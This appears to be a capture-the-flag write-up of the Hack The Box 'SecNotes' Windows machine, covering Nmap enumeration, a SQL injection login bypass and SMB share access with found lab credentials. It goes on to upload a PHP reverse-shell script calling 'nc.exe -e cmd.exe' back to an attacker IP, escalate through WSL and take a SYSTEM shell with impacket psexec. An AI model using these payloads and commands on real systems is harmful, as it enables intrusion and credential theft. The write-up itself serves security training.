SecNotes is a challenging box that tests the user’s ability to exploit common web application vulnerabilities to uncover sensitive information and upload files to gain access to the target. This box is interesting because it is a Windows target that tests the user’s Linux knowledge as well.
Step 1: Enumerating with NMAP
As usual, the first step in our investigation is to enumerate the target with NMAP.
➜ secnotes nmap -vv 10.129.3.204 -Pn -p-
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.93SVN ( https://nmap.org ) at 2023-01-31 16:49 EST
Initiating Parallel DNS resolution of 1 host. at 16:49
Completed Parallel DNS resolution of 1 host. at 16:49, 0.00s elapsed
Initiating Connect Scan at 16:49
Scanning 10.129.3.204 [65535 ports]
Discovered open port 445/tcp on 10.129.3.204
Discovered open port 80/tcp on 10.129.3.204
Connect Scan Timing: About 17.72% done; ETC: 16:52 (0:02:24 remaining)
Connect Scan Timing: About 45.94% done; ETC: 16:51 (0:01:12 remaining)
Discovered open port 8808/tcp on 10.129.3.204
Completed Connect Scan at 16:51, 106.55s elapsed (65535 total ports)
Nmap scan report for 10.129.3.204
Host is up, received user-set (0.028s latency).
Scanned at 2023-01-31 16:49:18 EST for 107s
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE REASON
80/tcp open http syn-ack
445/tcp open microsoft-ds syn-ack
8808/tcp open ssports-bcast syn-ack
Read data files from: /usr/local/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 106.59 seconds
It looks like we have three open ports, but we don’t have much information about them. Let’s run a more thorough scan to further enumerate this target.
➜ secnotes nmap -vv -A 10.129.3.204 -Pn -p 80,445,8808
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.93SVN ( https://nmap.org ) at 2023-01-31 16:52 EST
NSE: Loaded 156 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 16:52
Completed NSE at 16:52, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 16:52
Completed NSE at 16:52, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 16:52
Completed NSE at 16:52, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 16:52
Completed Parallel DNS resolution of 1 host. at 16:52, 0.00s elapsed
Initiating Connect Scan at 16:52
Scanning 10.129.3.204 [3 ports]
Discovered open port 80/tcp on 10.129.3.204
Discovered open port 445/tcp on 10.129.3.204
Discovered open port 8808/tcp on 10.129.3.204
Completed Connect Scan at 16:52, 0.05s elapsed (3 total ports)
Initiating Service scan at 16:52
Scanning 3 services on 10.129.3.204
Completed Service scan at 16:53, 11.34s elapsed (3 services on 1 host)
NSE: Script scanning 10.129.3.204.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 16:53
NSE Timing: About 99.76% done; ETC: 16:53 (0:00:00 remaining)
Completed NSE at 16:53, 40.08s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 16:53
Completed NSE at 16:53, 0.32s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 16:53
Completed NSE at 16:53, 0.00s elapsed
Nmap scan report for 10.129.3.204
Host is up, received user-set (0.033s latency).
Scanned at 2023-01-31 16:52:57 EST for 52s
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack Microsoft IIS httpd 10.0
| http-title: Secure Notes - Login
|_Requested resource was login.php
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
445/tcp open microsof� syn-ack Windows 10 Enterprise 17134 microsoft-ds (workgroup: HTB)
8808/tcp open http syn-ack Microsoft IIS httpd 10.0
|_http-title: IIS Windows
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
Service Info: Host: SECNOTES; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2023-01-31T21:53:14
|_ start_date: N/A
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows 10 Enterprise 17134 (Windows 10 Enterprise 6.3)
| OS CPE: cpe:/o:microsoft:windows_10::-
| Computer name: SECNOTES
| NetBIOS computer name: SECNOTES\x00
| Workgroup: HTB\x00
|_ System time: 2023-01-31T13:53:12-08:00
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 64449/tcp): CLEAN (Timeout)
| Check 2 (port 26875/tcp): CLEAN (Timeout)
| Check 3 (port 56767/udp): CLEAN (Timeout)
| Check 4 (port 32379/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: 2h40m00s, deviation: 4h37m09s, median: 0s
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 16:53
Completed NSE at 16:53, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 16:53
Completed NSE at 16:53, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 16:53
Completed NSE at 16:53, 0.00s elapsed
Read data files from: /usr/local/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 52.09 seconds
We were able to gather much more information with our second NMAP scan. It looks like we have web applications available on ports 80 and 8808, as well as SMB on port 445. Let’s continue our investigation by navigating to the web pages.
Step 2: Exploiting the Web Application with SQL Injection
Upon visiting the page at http://10.129.3.204/login.php we are presented with a login screen. Our first inclination is to try using SQL injection to bypass the login. We found the following article detailing potential SQL commands that may bypass a login screen: https://www.invicti.com/blog/web-security/sql-injection-cheat-sheet/. However, each of our attempts to bypass the login fails. Let’s try creating an account with the SQL command strings we used to attempt to bypass the login screen.
After creating several accounts and attempting to log in, we were finally given access with the credentials ' or 1=1#:' or 1=1#. Upon logging in we are presented with three notes, but the last one contains what appears to be login credentials.
\\secnotes.htb\new-site
tyler / 92g!mA8BGjOirkL%OG*&
Where could we potentially use these credentials? Earlier we saw that port 445 was open, let’s see if we can use SMB to login.
Step 3: Enumerating SMB
We can try viewing the SMB shares using the found credentials with the following command:
➜ secnotes smbclient -U 'tyler%92g!mA8BGjOirkL%OG*&' -L \\10.129.3.204
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
new-site Disk
SMB1 disabled -- no workgroup available
We can see that there are three shares, but we aren’t given much info. Let’s try using smbmap to gather more information.
➜ secnotes smbmap -R -u "tyler" -p '92g!mA8BGjOirkL%OG*&' -H 10.129.3.204
[+] IP: 10.129.3.204:445 Name: 10.129.3.204
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
.\IPC$\*
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 InitShutdown
fr--r--r-- 4 Sun Dec 31 19:03:58 1600 lsass
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 ntsvcs
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 scerpc
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-380-0
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 epmapper
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-1ec-0
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 LSM_API_service
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 eventlog
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-40c-0
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 atsvc
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-568-0
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 spoolss
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-868-0
fr--r--r-- 4 Sun Dec 31 19:03:58 1600 wkssvc
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 trkwks
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 mysqld2656_pipe
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 tapsrv
fr--r--r-- 4 Sun Dec 31 19:03:58 1600 srvsvc
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 vgauth-service
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-278-0
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 ROUTER
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 browser
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 Winsock2\CatalogChangeListener-280-0
fr--r--r-- 4 Sun Dec 31 19:03:58 1600 MsFteWds
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 SearchTextHarvester
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 PSHost.133196752503708353.6440.DefaultAppDomain.powershell
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 PSHost.133196752500396213.780.DefaultAppDomain.powershell
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 iisipm444366d6-4801-416c-a7b4-8689e057236c
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 iislogpiped3cea27d-1d29-48e3-a63a-65f61a127bcf
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 iisipm295933ca-f9e6-427e-87f0-2066493063d2
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 iislogpiped5d108b7-37fd-4737-a0e3-aeb37b909059
fr--r--r-- 3 Sun Dec 31 19:03:58 1600 W32TIME_ALT
fr--r--r-- 1 Sun Dec 31 19:03:58 1600 IISFCGI-848fb497-cd7f-4ab9-bdab-7325e18cbcff
new-site READ, WRITE
.\new-site\*
dr--r--r-- 0 Tue Jan 31 17:13:03 2023 .
dr--r--r-- 0 Tue Jan 31 17:13:03 2023 ..
fr--r--r-- 696 Thu Jun 21 16:15:36 2018 iisstart.htm
fr--r--r-- 98757 Thu Jun 21 16:15:38 2018 iisstart.png
We appear to have read and write permissions on the new-site directory, which appears to be the root of an additional web site. Could this be the web root for the site running at http://10.129.3.204:8808/?
Step 4: Gaining Initial Access via Arbitrary File Upload
We are able to write to the web directory at http://10.129.3.204:8808/, but we are unable to get any reverse shells to connect back to us. Let’s try uploading a copy of netcat and a php script that calls back to our own netcat listener to get a connection. We can find a copy of netcat in the following github repo: https://github.com/int0x33/nc.exe.
First we need to write a php script that will connect back to us via netcat:
<?php
system('nc.exe -e cmd.exe 10.10.16.7 4444')
?>
Now we need to upload the files with smbmap:
➜ secnotes smbmap -H 10.129.3.204 -u 'tyler' -p '92g!mA8BGjOirkL%OG*&' --upload nc.php new-site/nc.php
[+] Starting upload: nc.php (53 bytes)
[+] Upload complete.
➜ secnotes smbmap -H 10.129.3.204 -u 'tyler' -p '92g!mA8BGjOirkL%OG*&' --upload nc.exe/nc.exe new-site/nc.exe
[+] Starting upload: nc.exe/nc.exe (38616 bytes)
[+] Upload complete.
Now we need to set up our listener with netcat to catch the reverse shell.
➜ secnotes nc -lvnp 4444
Listening on 0.0.0.0 4444
We can trigger the connection by visiting the following page in a web browser: http://10.129.3.204:8808/nc.php, and we are quickly connected to the server.
Connection received on 10.129.3.204 51110
Microsoft Windows [Version 10.0.17134.228]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\inetpub\new-site>whoami
whoami
secnotes\tyler
We can now navigate to the user’s desktop and grab the first flag.
Step 5. Escalating Privileges
After searching through the filesystem on the target, we eventually find a Distros folder, indicating that windows Subsystem for Linux may be present on this box.
C:\>dir
dir
Volume in drive C has no label.
Volume Serial Number is 1E7B-9B76
Directory of C:\
06/21/2018 02:07 PM <DIR> Distros
06/21/2018 05:47 PM <DIR> inetpub
06/22/2018 01:09 PM <DIR> Microsoft
04/11/2018 03:38 PM <DIR> PerfLogs
06/21/2018 07:15 AM <DIR> php7
01/26/2021 02:39 AM <DIR> Program Files
01/26/2021 02:38 AM <DIR> Program Files (x86)
06/21/2018 02:07 PM 201,749,452 Ubuntu.zip
06/21/2018 02:00 PM <DIR> Users
01/26/2021 02:38 AM <DIR> Windows
1 File(s) 201,749,452 bytes
9 Dir(s) 13,896,142,848 bytes free
C:\>
This prompted us to search the web and seek out WSL privilege escalation techniques. We found the following web page: https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation. Apparently, there are several locations where we can find a bash.exe to give us access to WSL. We do some searching and eventually find the appropriate file at: C:\Windows\WinSxS\amd64_microsoft-windows-lxss-bash_31bf3856ad364e35_10.0.17134.1_none_251beae725bc7de5\bash.exe. Let’s run the exe and begin exploring WSL.
Step 6: Exploring WSL
Upon launching the exe, we are immediately dropped into a shell. We first need to use python to upgrade our shell:
C:\Windows\WinSxS\amd64_microsoft-windows-lxss-bash_31bf3856ad364e35_10.0.17134.1_none_251beae725bc7de5>bash.exe
bash.exe
mesg: ttyname failed: Inappropriate ioctl for device
ls
bash.exe
python --version
Python 2.7.15rc1
python -c 'import pty; pty.spawn("/bin/bash")'
root@SECNOTES:~#
We can see that we are root in WSL, but how can we become SYSTEM or Administrator? Let’s check the history of recently run commands to see what has been run on the system:
root@SECNOTES:~# history
history
1 cd /mnt/c/
2 ls
3 cd Users/
4 cd /
5 cd ~
6 ls
7 pwd
8 mkdir filesystem
9 mount //127.0.0.1/c$ filesystem/
10 sudo apt install cifs-utils
11 mount //127.0.0.1/c$ filesystem/
12 mount //127.0.0.1/c$ filesystem/ -o user=administrator
13 cat /proc/filesystems
14 sudo modprobe cifs
15 smbclient
16 apt install smbclient
17 smbclient
18 smbclient -U 'administrator%u6!4ZwgwOM#^OBf#Nwnh' \\\\127.0.0.1\\c$
19 > .bash_history
20 less .bash_history
21 history
root@SECNOTES:~#
We can see that the someone used smbclient to log into the Windows SMB share as administrator. Maybe we can use these credentials to sign into Windows with impacket’s psexec module.
➜ impacket ls
build ChangeLog.md dist Dockerfile examples impacket impacket.egg-info LICENSE MANIFEST.in README.md requirements-test.txt requirements.txt SECURITY.md setup.py TESTING.md tests tox.ini
➜ impacket cd examples
➜ examples ls
addcomputer.py exchanger.py GetNPUsers.py goldenPac.py machine_role.py netview.py ping.py registry-read.py samrdump.py smbpasswd.py split.py wmipersist.py
atexec.py findDelegation.py getPac.py karmaSMB.py mimikatz.py nmapAnswerMachine.py psexec.py reg.py secretsdump.py smbrelayx.py ticketConverter.py wmiquery.py
dcomexec.py GetADUsers.py getST.py keylistattack.py mqtt_check.py ntfs-read.py raiseChild.py rpcdump.py services.py smbserver.py ticketer.py
dpapi.py getArch.py getTGT.py kintercept.py mssqlclient.py ntlmrelayx.py rbcd.py rpcmap.py smbclient.py sniffer.py tstool.py
esentutl.py Get-GPPPassword.py GetUserSPNs.py lookupsid.py mssqlinstance.py ping6.py rdp_check.py sambaPipe.py smbexec.py sniff.py wmiexec.py
➜ examples python3 psexec.py 'administrator:u6!4ZwgwOM#^OBf#Nwnh'@10.129.3.204
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Requesting shares on 10.129.3.204.....
[*] Found writable share ADMIN$
[*] Uploading file glzytjGs.exe
[*] Opening SVCManager on 10.129.3.204.....
[*] Creating service bJAC on 10.129.3.204.....
[*] Starting service bJAC.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17134.228]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32> whoami
nt authority\system
We are able to log in with the found credentials via psexec and we are immediately dropped into a SYSTEM shell. The only step that remains is to grab the root flag from the administrator’s desktop and submit.